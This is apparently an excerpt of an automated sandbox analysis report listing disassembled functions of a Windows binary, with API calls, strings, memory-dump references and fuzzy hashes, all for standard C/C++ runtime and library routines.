Instruction ID: 9dbfd3ebbb5ce19dcbce875d6dc7310b72f47bfd7491d00ddd98a47d6e49a2a6
Opcode Fuzzy Hash: 172404c934a2943d0c5ba09fb46107580345ca12a3a6b588df71c5052e0d528b
Instruction Fuzzy Hash: 7E01F73220C2215EAF2777B9BC85A27279EDB02778B21073AF150D94F1EF525C009385

Uniqueness

Uniqueness Score: -1.00%

Function 003A5B8F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BDB9D09C,?,?,00000000,003B6AEB,000000FF,?,003A5B1F,00000002,tH:,003A5AF3,tH:), ref: 003A5BC4
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003A5BD6
FreeLibrary.KERNEL32(00000000,?,?,00000000,003B6AEB,000000FF,?,003A5B1F,00000002,tH:,003A5AF3,tH:), ref: 003A5BF8

Strings

CorExitProcess, xrefs: 003A5BCE
mscoree.dll, xrefs: 003A5BBD

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2c7cf40de8bd63027ddbbec6794008b31ead05e09fa7c5421a3e25ffe79a44a7
Instruction ID: f07d92382fc1908cedadd6421cda86723c8573a759974995cff509053f2a5788
Opcode Fuzzy Hash: 2c7cf40de8bd63027ddbbec6794008b31ead05e09fa7c5421a3e25ffe79a44a7
Instruction Fuzzy Hash: 9201A731948A19ABCB139F54CC09FEE77BCFB44719F044625F912A26E0DB749900CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AA Relevance: 7.7, APIs: 5, Instructions: 248COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 0041A4E5
__freea.LIBCMT ref: 0041A4EB
__freea.LIBCMT ref: 0041A521
__freea.LIBCMT ref: 0041A527
__freea.LIBCMT ref: 0041A537

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: __freea
String ID:
API String ID: 240046367-0
Opcode ID: 1f2ed74f7ca1864c194b01ef2bbed7803c98c6ae8fcbabfe6cba9a12c834c3bf
Instruction ID: aa6cff2fbaa3cb8c6ea836fdf22375dd9dfbff157a0896444d02091bd79c4ece
Opcode Fuzzy Hash: 1f2ed74f7ca1864c194b01ef2bbed7803c98c6ae8fcbabfe6cba9a12c834c3bf
Instruction Fuzzy Hash: BD713772905209ABDF219F648D41BEF77A69F45304F14001BEC14BB382D63DDCA1875A

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AA Relevance: 7.7, APIs: 5, Instructions: 248COMMON

Download Yara Rule

APIs

__freea.LIBCMT ref: 0041A4E5
__freea.LIBCMT ref: 0041A4EB
__freea.LIBCMT ref: 0041A521
__freea.LIBCMT ref: 0041A527
__freea.LIBCMT ref: 0041A537

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: __freea
String ID:
API String ID: 240046367-0
Opcode ID: 1f2ed74f7ca1864c194b01ef2bbed7803c98c6ae8fcbabfe6cba9a12c834c3bf
Instruction ID: aa6cff2fbaa3cb8c6ea836fdf22375dd9dfbff157a0896444d02091bd79c4ece
Opcode Fuzzy Hash: 1f2ed74f7ca1864c194b01ef2bbed7803c98c6ae8fcbabfe6cba9a12c834c3bf
Instruction Fuzzy Hash: BD713772905209ABDF219F648D41BEF77A69F45304F14001BEC14BB382D63DDCA1875A

Uniqueness

Uniqueness Score: -1.00%

Function 003E0830 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003E085A
std::_Lockit::_Lockit.LIBCPMT ref: 003E087C
std::_Lockit::~_Lockit.LIBCPMT ref: 003E08A4
std::_Facet_Register.LIBCPMT ref: 003E099A
std::_Lockit::~_Lockit.LIBCPMT ref: 003E09C4

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction ID: 3023c8256fede2cab6bdecc8bce418cd04fcac9eeb589fca437340210194af9c
Opcode Fuzzy Hash: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction Fuzzy Hash: 6C518CB0900298DFDB16DF58C845BAEBBF0FB10314F24865DE845AB382D7B5AA45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003E0830 Relevance: 7.6, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 003E085A
std::_Lockit::_Lockit.LIBCPMT ref: 003E087C
std::_Lockit::~_Lockit.LIBCPMT ref: 003E08A4
std::_Facet_Register.LIBCPMT ref: 003E099A
std::_Lockit::~_Lockit.LIBCPMT ref: 003E09C4

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction ID: 3023c8256fede2cab6bdecc8bce418cd04fcac9eeb589fca437340210194af9c
Opcode Fuzzy Hash: 08538a2e2ebb705bae5228e17322a5acbd34cb48e70500a9406b1931b77c7c8c
Instruction Fuzzy Hash: 6C518CB0900298DFDB16DF58C845BAEBBF0FB10314F24865DE845AB382D7B5AA45CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 003994CD Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 003994D4
std::_Lockit::_Lockit.LIBCPMT ref: 003994DE

Part of subcall function 00391A00: std::_Lockit::_Lockit.LIBCPMT ref: 00391A0F
Part of subcall function 00391A00: std::_Lockit::~_Lockit.LIBCPMT ref: 00391A2A

codecvt.LIBCPMT ref: 00399518
std::_Facet_Register.LIBCPMT ref: 0039952F
std::_Lockit::~_Lockit.LIBCPMT ref: 0039954F

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 6842b5eef0de8389a328084a845e1700c4c9d7683fdd41203ff9dcfc972e0fbb
Instruction ID: 6615e27a93ef87c7c92add9b6ae93a4bf4b371fb28d00648c96a39a9f752ac10
Opcode Fuzzy Hash: 6842b5eef0de8389a328084a845e1700c4c9d7683fdd41203ff9dcfc972e0fbb
Instruction Fuzzy Hash: 6B11B1759142299FCF17AB68C9027AEB7B8EF84324F15440EE401AB282DF74EE00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00397DD0 Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00397DD7
std::_Lockit::_Lockit.LIBCPMT ref: 00397DE1

Part of subcall function 00391A00: std::_Lockit::_Lockit.LIBCPMT ref: 00391A0F
Part of subcall function 00391A00: std::_Lockit::~_Lockit.LIBCPMT ref: 00391A2A

codecvt.LIBCPMT ref: 00397E1B
std::_Facet_Register.LIBCPMT ref: 00397E32
std::_Lockit::~_Lockit.LIBCPMT ref: 00397E52

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: fa447e182a7040aa464c340468e63fbb66843f399d9ef595e36930661120e1d1
Instruction ID: 618e14f5020f184b9c2007f4bc412e063ef3d4f76daba16941bc827e7def2ba9
Opcode Fuzzy Hash: fa447e182a7040aa464c340468e63fbb66843f399d9ef595e36930661120e1d1
Instruction Fuzzy Hash: 0D11D3759182299FCF07EB68C9026AEB7B9EF84750F14484DE505EB3C1DB70EE008B90

Uniqueness

Uniqueness Score: -1.00%

Function 00399250 Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00399257
std::_Lockit::_Lockit.LIBCPMT ref: 00399262
std::_Lockit::~_Lockit.LIBCPMT ref: 003992D0

Part of subcall function 003993B3: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003993CB

std::locale::_Setgloballocale.LIBCPMT ref: 0039927D
_Yarn.LIBCPMT ref: 00399293

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 394a0699adcb7a5de6823fd043e92675984ed107124a3fe3aaeffe7437330b0f
Instruction ID: 786142ae1f0b254cd65faaeabe4d2693ea27b2f6ea7d5bf450a4fee11456fb26
Opcode Fuzzy Hash: 394a0699adcb7a5de6823fd043e92675984ed107124a3fe3aaeffe7437330b0f
Instruction Fuzzy Hash: A1015A79A05121ABDF07EF64D895ABCBBA5FB85344F15840AE9015B3C1CF74AA02CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00395E70 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 485COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00395EF4
_strcspn.LIBCMT ref: 00395F1A

Part of subcall function 00391330: ___std_exception_copy.LIBVCRUNTIME ref: 0039135C

Strings

d;, xrefs: 00395EC9
h;, xrefs: 00395ED3

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: _strcspn$___std_exception_copy
String ID: d;$h;
API String ID: 615424513-2821231878
Opcode ID: c95fb05b3b3e86379869ec76020b8fd027ab7047112abd6a5040f0767530e60a
Instruction ID: 25b0748e9485fcfff514799a39f2d1dfa6e2241cf45ddaea2b32c31014a1185b
Opcode Fuzzy Hash: c95fb05b3b3e86379869ec76020b8fd027ab7047112abd6a5040f0767530e60a
Instruction Fuzzy Hash: 2002AB75509344AFCB06CF24C88596FBBE9FF89304F544A2EF8958B221D731E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 003E8190 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 430COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 003E8316
Concurrency::cancel_current_task.LIBCPMT ref: 003E8525

Strings

@cX, xrefs: 003E861E

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: @cX
API String ID: 118556049-2763765104
Opcode ID: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction ID: 72a2023d3a058f80d6cd852530d591cf3e8a3000d6a1d607f78a738a6c7e6baa
Opcode Fuzzy Hash: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction Fuzzy Hash: ECE1C371E002159FCB15DF69C981BAEBBB5EB48310F104729E919EB3D5EB30AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003E8190 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 430COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 003E8316
Concurrency::cancel_current_task.LIBCPMT ref: 003E8525

Strings

@cX, xrefs: 003E861E

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: @cX
API String ID: 118556049-2763765104
Opcode ID: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction ID: 72a2023d3a058f80d6cd852530d591cf3e8a3000d6a1d607f78a738a6c7e6baa
Opcode Fuzzy Hash: 22de6d2121386a8688ef1e3d84cb010042b9be8688daba126b9209ba363cb2bd
Instruction Fuzzy Hash: ECE1C371E002159FCB15DF69C981BAEBBB5EB48310F104729E919EB3D5EB30AE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00396510 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 387COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 0039659C
_strcspn.LIBCMT ref: 003965C2

Strings

d;, xrefs: 0039656D
h;, xrefs: 00396577

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: _strcspn
String ID: d;$h;
API String ID: 3709121408-2821231878
Opcode ID: 09ade77b1dd72981d606008880ae5022ccc48e6f68abf8ba10b21b9903b5ff4c
Instruction ID: da46722f90813e823e95292fd2e3777584e8c6a9da161dae89fba2b54ed7883a
Opcode Fuzzy Hash: 09ade77b1dd72981d606008880ae5022ccc48e6f68abf8ba10b21b9903b5ff4c
Instruction Fuzzy Hash: 75E199752093419FDB06DF68C895A6BBBE6FF89304F05492DF8998B221D731ED04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 004070C3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 004071DE
__dosmaperr.LIBCMT ref: 004071FD
__dosmaperr.LIBCMT ref: 004073A3

Strings

H, xrefs: 00407328

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 003C5000, based on PE: true

Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction ID: 63436df6dc1ae0faeb18137728592e23970696ff3f6c9f2b24ee46848e04662b
Opcode Fuzzy Hash: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction Fuzzy Hash: E4A12632A146149FCF19AF68DC92BAE3BA1AB06314F14016EF801BF3D1D7389C16DB56

Uniqueness

Uniqueness Score: -1.00%

Function 004070C3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 004071DE
__dosmaperr.LIBCMT ref: 004071FD
__dosmaperr.LIBCMT ref: 004073A3

Strings

H, xrefs: 00407328

Memory Dump Source

Source File: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction ID: 63436df6dc1ae0faeb18137728592e23970696ff3f6c9f2b24ee46848e04662b
Opcode Fuzzy Hash: e762474d18bea60e1aaf4882e31d1a3a7bcf1b57b5c7f4dbe6931a43b0312cca
Instruction Fuzzy Hash: E4A12632A146149FCF19AF68DC92BAE3BA1AB06314F14016EF801BF3D1D7389C16DB56

Uniqueness

Uniqueness Score: -1.00%

Function 0039E94D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0039E972
CatchIt.LIBVCRUNTIME ref: 0039EA58

Strings

RCC, xrefs: 0039E98C
MOC, xrefs: 0039E984

Memory Dump Source

Source File: 00000016.00000002.2809383684.0000000000391000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00390000, based on PE: true

Associated: 00000016.00000002.2809364461.0000000000390000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809411169.00000000003B7000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.00000000003C5000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.000000000054F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809429426.0000000000552000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809582012.000000000055D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000016.00000002.2809597958.000000000055E000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_390000_v6ggwc2fJXXgIu5fzDQ2.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: ed72a2fff66f25a399b13ba28c3dc387c41385eb35b4105b1ff29d64a68f645e
Instruction ID: 9a2b502ea601d595d58d5974f31e80257fb7bf7d32d0d4eb70d1eb125d9874a2
Opcode Fuzzy Hash: ed72a2fff66f25a399b13ba28c3dc387c41385eb35b4105b1ff29d64a68f645e
Instruction Fuzzy Hash: AE416B72900209EFCF16DF98DD81AEEBBB5FF48304F198159F904AB261D335AA51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00392190 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0039222D

Part of subcall function 0039BCA0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00397D55,?,003C0178,?), ref: 0039BD00

Strings

ios_base::eofbit set, xrefs: 003921D6
